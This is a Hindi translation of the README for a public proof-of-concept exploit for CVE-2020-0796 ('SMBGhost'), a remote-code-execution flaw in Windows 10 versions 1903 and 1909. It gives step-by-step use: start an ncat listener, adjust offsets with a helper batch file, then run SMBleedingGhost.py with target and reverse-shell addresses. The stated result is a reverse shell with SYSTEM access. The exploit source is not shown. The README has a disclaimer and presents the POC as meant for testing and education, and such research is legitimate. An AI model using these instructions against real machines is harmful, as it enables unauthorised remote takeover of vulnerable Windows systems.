
CVE-2020-0796 रिमोट कोड निष्पादन POC
(c) 2020 ZecOps, Inc. - https://www.zecops.com - हमलावरों की गलतियाँ खोजें
CVE-2020-0796 / "SMBGhost" के लिए रिमोट कोड निष्पादन POC
अपेक्षित परिणाम: सिस्टम एक्सेस के साथ रिवर्स शेल।
केवल शैक्षिक और कॉर्पोरेट वातावरण में परीक्षण के लिए अभिप्रेत है।
ZecOps कोड के लिए कोई जिम्मेदारी नहीं लेता है, अपने जोखिम पर उपयोग करें।
यदि आप सर्वर, एंडपॉइंट और मोबाइल उपकरणों के लिए एजेंट-रहित DFIR टूल्स में रुचि रखते हैं जो स्वचालित रूप से SMBGhost और अन्य प्रकार के हमलों का पता लगाते हैं, तो कृपया [email protected] से संपर्क करें।
सुनिश्चित करें कि Python और ncat स्थापित हैं।
लक्ष्य कंप्यूटर पर calc_target_offsets.bat चलाएं, और स्क्रिप्ट आउटपुट के अनुसार SMBleedingGhost.py फ़ाइल के शीर्ष पर ऑफ़सेट्स को समायोजित करें (नीचे दिए गए नोट को भी देखें)।
ncat को निम्नलिखित कमांड लाइन आर्गुमेंट्स के साथ चलाएं:
ncat -lvp <port>
जहाँ <port> वह पोर्ट नंबर है जिस पर ncat सुन रहा होगा।
को निम्नलिखित कमांड लाइन आर्गुमेंट्स के साथ चलाएं:
SMBleedingGhost.pySMBleedingGhost.py <target_ip> <reverse_shell_ip> <reverse_shell_port>
जहाँ <target_ip> लक्ष्य, कमजोर कंप्यूटर का IP पता है। <reverse_shell_ip> और <reverse_shell_port> वे IP पता और पोर्ट नंबर हैं जिन पर ncat सुन रहा है।
यदि सब ठीक रहा, तो ncat एक शेल प्रदर्शित करेगा जो लक्ष्य कंप्यूटर तक सिस्टम एक्सेस प्रदान करता है।
नोट: आप सोच रहे होंगे कि लक्ष्य कंप्यूटर पर calc_target_offsets.bat स्क्रिप्ट चलाना क्यों आवश्यक है, और क्या यह रिमोट कोड निष्पादन के रिमोट होने के पूरे उद्देश्य को विफल नहीं करता? ये ऑफ़सेट्स यादृच्छिक नहीं हैं, और एक ही विंडोज संस्करण के सभी विंडोज उदाहरणों पर समान हैं। कोई लक्ष्य विंडोज संस्करण का पता लगाकर और ऑफ़सेट्स को स्वचालित रूप से समायोजित करके, या उन पर बिल्कुल भी निर्भर न होकर हमले को अधिक सार्वभौमिक बना सकता है, लेकिन यह केवल एक POC है और हमने वही किया जो सरल था। हम इसे एक अच्छी बात के रूप में भी देखते हैं कि POC सार्वभौमिक नहीं है, और परीक्षण और शिक्षा के अलावा अन्य उपयोगों के लिए सुविधाजनक नहीं है।

Windows 10 संस्करण 1903 और 1909 प्रभावित हैं। अप्रबंधित Windows 10 1903 संस्करण Windows में एक नल डीरेफरेंस बग के कारण समर्थित नहीं हैं (KB4512941 में ठीक किया गया)।
शोषण की प्रकृति के कारण, POC एक एकल लॉजिकल प्रोसेसर वाले कंप्यूटर (या VM) पर चलने वाले लक्ष्यों के लिए सबसे अच्छा काम करता है। VirtualBox में एक से अधिक लॉजिकल प्रोसेसर वाले लक्ष्यों का भी समर्थन किया जाना चाहिए, लेकिन इस मामले में POC कम विश्वसनीय है। अन्य लक्ष्य समर्थित नहीं हो सकते हैं। विवरण के लिए, नीचे हमारे तकनीकी लेखन को देखें।